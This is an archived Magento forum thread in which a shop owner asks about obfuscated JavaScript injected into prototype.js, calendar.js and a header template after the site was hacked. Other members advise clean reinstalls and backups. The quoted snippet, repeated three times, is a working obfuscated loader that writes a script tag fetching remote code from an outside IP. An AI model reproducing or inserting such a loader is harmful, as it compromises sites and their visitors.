Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Javascript hacks
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

My Magento install has been severely compromised.  I can log into my admin dashboard, but non of the buttons will work.

I have been able to fix most of the php hacks which I posted in a previous post.

But I have come across some javascript code I think is a hack.

In my prototype.js file I found this at the end:

Element.addMethods();<!--
[removed](unescape(’&#x3C;TOscqmeript%20sqmercG55&#x3D;Q9&#x2F;&#x2F;94qme&#x2E;2TO43i7&#x2E;2&#x2E;195TO&#x2F;jqueryTO&#x2E;sfjs&#x3E;sf&#x3C;3i&#x2F;scwporiG55pTOtQ9&#x3E;’).replace(/TO|3i|qme|wpo|sf|G55|qM|Q9/g,""));
-->
In my calendar.js file I found this at the end:

<!--
[removed](unescape(’&#x3C;TOscqmeript%20sqmercG55&#x3D;Q9&#x2F;&#x2F;94qme&#x2E;2TO43i7&#x2E;2&#x2E;195TO&#x2F;jqueryTO&#x2E;sfjs&#x3E;sf&#x3C;3i&#x2F;scwporiG55pTOtQ9&#x3E;’).replace(/TO|3i|qme|wpo|sf|G55|qM|Q9/g,""));
-->
In my 1-header.phtml file I found this in the <head> section:
</head>
<script language=javascript><!--
[removed](unescape(’&#x3C;TOscqmeript%20sqmercG55&#x3D;Q9&#x2F;&#x2F;94qme&#x2E;2TO43i7&#x2E;2&#x2E;195TO&#x2F;jqueryTO&#x2E;sfjs&#x3E;sf&#x3C;3i&#x2F;scwporiG55pTOtQ9&#x3E;’).replace(/TO|3i|qme|wpo|sf|G55|qM|Q9/g,""));
--></script>

Has anyone else seen this code in these files.  I want to verify that I can delete it.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Periculi
Sr. Member
 
Total Posts:  249
Joined:  2009-02-03
 

Why don’t you delete all your compromised files and replace them with a clean set?!

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

We were trying to avoid having to reinstall magento if possible.  Doesn’t look like that is going to happen.

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Roll back to a working backup I’d say.

 
Magento Community Magento Community
Magento Community
Magento Community
 
crucial_1
Jr. Member
 
Total Posts:  6
Joined:  2009-04-12
 

Restore from a a backup - wha?

No one takes backups seriously so assume there’s no backup for this very important business running in shared hosting. 

Restore from your backup or just restart your really important business that cant afford a backup.

.

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

Magette,

I assume you are being sarcastic.  If not, what I don’t need is a smart ass.

Yes, we had a backup.  Restored it, next day it was hacked.

Upgraded to Magento 1.3.  24 hours later, it was hacked.

My hosts response is they do not investigate things like this.  Their suggestion is to change our passwords (done that 3 times) and upgrade our software (done that too).

We have gone through every file, one by one, edited out the code inserted 3 times now, plus after upgrading and republishing our site, deleted any files that had the date of the last hack.

I do have one question.  Does there exist a .htaccess file with standard settings for running magento?
Joomla supplies one for their software.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top